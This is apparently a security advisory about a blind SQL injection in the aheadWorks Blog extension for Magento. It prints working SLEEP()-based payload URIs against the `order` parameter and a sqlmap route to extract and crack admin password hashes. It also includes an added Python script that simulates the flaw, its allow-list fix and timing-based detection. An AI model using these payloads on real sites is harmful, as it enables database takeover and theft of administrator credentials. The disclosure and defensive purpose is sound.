The aheadWorks Blog extension for Magento prior to version 1.3.10 is vulnerable to a critical SQL Injection security flaw. A remote unauthenticated attacker could exploit this vulnerability to take complete control of the affected Magento server and database.
With almost 80,000 downloads at the time of writing, the affected component is the most popular blog component available via Magento Connect.
The SQL Injection flaw was discovered using the AppCheck NG scanner during preparation for a security seminar.
The exercise involved configuring several popular CMS platforms including WordPress, Joomla, Drupal and Magento along with the most popular plugins available at the time for each platform.
A default AppCheck NG scan was then run against each system to demonstrate that the scanner can discover previously undisclosed security flaws without any target-specific configuration.
Among the vulnerabilities discovered was a blind SQL injection flaw in the aheadWorks Blog extension, reachable through the `order` (sort column) request parameter of the blog listing page. AppCheck identified the flaw by triggering a measurable time delay with the MySQL SLEEP() function. For example, the following URI triggers a 10 second delay when accessed in a web browser:
http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(10))A)) OR 1234=4321
Compare this with the following URI, which triggers only a 2 second delay; the difference between the two response times is what confirms that the injected expression is being evaluated by the database:
http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(2))A)) OR 1234=4321
AppCheck NG employs a range of methods to detect blind SQL injection including time delay inference. Each suspected flaw is confirmed through 15 validation cycles to eradicate false positives.
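As an added, runnable illustration of the bug class and the detection method described above (this is not code from the page or from aheadWorks), the Python script below models the flaw offline: an in-memory SQLite table stands in for the extension's blog table, a Python function registered as SLEEP() stands in for MySQL's SLEEP(), and the query shape, with the `order` and `dir` parameters concatenated straight into ORDER BY, is an assumption about the extension, since its source is not reproduced here. It shows the page's payload producing a delay that tracks the requested value, an allow-list fix that rejects the payload, and a timing check that, like the scanner's repeated validation cycles, requires the delay to reproduce across several rounds before reporting a finding.

```python
"""Time-based blind SQL injection through an unvalidated sort parameter.

Constructed example: SQLite in memory stands in for MySQL, and a registered
Python function stands in for MySQL's SLEEP(). The ORDER BY construction is an
assumption about the vulnerable extension, not its actual source.
"""
import sqlite3
import time

# Allow-list for the fixed version: ORDER BY column names and directions cannot
# be bound as prepared-statement parameters, so they must be validated instead.
ALLOWED_ORDER_COLUMNS = {"title", "user", "created_time"}
ALLOWED_DIRECTIONS = {"asc", "desc"}


def make_db():
    """Build a small constructed blog table and register a SLEEP() emulation."""
    conn = sqlite3.connect(":memory:")
    # MySQL SLEEP(n) blocks for n seconds and returns 0; emulate that here.
    conn.create_function("SLEEP", 1, lambda secs: time.sleep(secs) or 0)
    conn.execute(
        "CREATE TABLE blog_post (id INTEGER PRIMARY KEY, title TEXT, "
        "user TEXT, created_time TEXT)"
    )
    conn.executemany(
        "INSERT INTO blog_post (title, user, created_time) VALUES (?, ?, ?)",
        [
            ("First", "alice", "2015-01-01"),
            ("Second", "bob", "2015-02-01"),
            ("Third", "carol", "2015-03-01"),
        ],
    )
    return conn


def list_posts_vulnerable(conn, order, direction):
    """Assumed vulnerable pattern: request parameters concatenated into ORDER BY."""
    sql = f"SELECT title FROM blog_post ORDER BY {order} {direction}"
    return [row[0] for row in conn.execute(sql)]


def list_posts_fixed(conn, order, direction):
    """Hardened version: only allow-listed column names and directions reach SQL."""
    if order not in ALLOWED_ORDER_COLUMNS or direction not in ALLOWED_DIRECTIONS:
        raise ValueError("unsupported sort parameter")
    sql = f"SELECT title FROM blog_post ORDER BY {order} {direction}"
    return [row[0] for row in conn.execute(sql)]


def sleep_payload(seconds):
    """The page's payload shape for the `order` parameter, with the delay varied."""
    return f"user AND 1=((SELECT 1 FROM (SELECT SLEEP({seconds}))A)) OR 1234=4321"


def elapsed(fn, *args):
    """Wall-clock time of one request; an error response is still timed."""
    start = time.monotonic()
    try:
        fn(*args)
    except (ValueError, sqlite3.Error):
        pass  # a rejected request returns quickly, which is the point
    return time.monotonic() - start


def looks_time_injectable(conn, list_fn, short=0.2, long=0.6, rounds=3):
    """Time-delay inference with repeated validation.

    Reports a finding only if, in every round, the extra response time tracks
    both requested delays (90% tolerance for timer jitter). A single slow
    response is not enough, which keeps transient latency from producing a
    false positive.
    """
    for _ in range(rounds):
        t_base = elapsed(list_fn, conn, "user", "desc")
        t_short = elapsed(list_fn, conn, sleep_payload(short), "desc")
        t_long = elapsed(list_fn, conn, sleep_payload(long), "desc")
        if t_short - t_base < short * 0.9 or t_long - t_base < long * 0.9:
            return False
    return True


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", looks_time_injectable(db, list_posts_vulnerable))
    print("fixed:     ", looks_time_injectable(db, list_posts_fixed))
```

The fix deliberately does not try to escape or quote the sort column: identifiers and keywords in ORDER BY are not data, so the only robust control is to map the request value onto a fixed set of known column names before it is placed in the query.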
An attacker could exploit this flaw with publicly available tools such as sqlmap (http://sqlmap.org/), using its time-based blind technique against the `order` parameter. Extracting the username and password hash columns from the admin_user table then allows the administrator's password to be recovered offline by cracking the hash (Magento 1.x stores admin passwords as salted MD5, which is quick to attack offline), giving the attacker Magento administrator credentials.
A demonstration of this flaw is performed at our free application security seminar. See the following URL for our next event: http://appcheck-ng.com/events/
This flaw was reported to aheadWorks on 22 April 2015. A fix, version 1.3.10, was made available on 27 May 2015 and can be downloaded via Magento Connect.